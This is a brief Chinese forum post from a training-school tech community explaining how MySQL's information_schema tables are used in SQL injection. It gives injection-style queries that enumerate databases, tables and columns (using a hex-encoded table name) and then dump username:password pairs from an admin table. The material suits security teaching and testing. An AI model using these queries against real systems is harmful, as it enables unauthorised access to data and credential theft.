A股上市公司传智教育(股票代码 003032)旗下技术交流社区北京昌平校区

 找回密码
 加入黑马

QQ登录

只需一步,快速开始

© 抠脚小清新 初级黑马   /  2018-12-20 12:41  /  463 人查看  /  0 人回复  /   0 人收藏 转载请遵从CC协议 禁止商业使用本文

mysql中的information_schema 结构用来存储数据库系统信息

information_schema 结构中这几个表存储的信息,在注射中可以用到的几个表。 


| SCHEMATA ――>存储数据库名的,

|——>关键字段:SCHEMA_NAME,表示数据库名称


| TABLES ――>存储表名的

|——>关键字段:TABLE_SCHEMA表示表所属的数据库名称;

TABLE_NAME表示表的名称


| COLUMNS ――>存储字段名的

|——>关键字段:TABLE_SCHEMA表示表所属的数据库名称;

TABLE_NAME表示所属的表的名称

    COLUMN_NAME表示字段名


可以看到,我们只要通过注射点构造查询语句遍相关字段,就可以得到我们想要的信息了。

爆所有数据名


select group_concat(SCHEMA_NAME) from information_schema.schemata


得到当前库的所有表

select group_concat(table_name) from information_schema.tables where table_schema=database()


得到表中的字段名 将敏感的表进行16进制编码adminuser=0x61646D696E75736572

select group_concat(column_name) from information_schema.columns where table_name=0x61646D696E75736572



得到字段具体的值

select group_concat(username,0x3a,password) from adminuser

0 个回复

您需要登录后才可以回帖 登录 | 加入黑马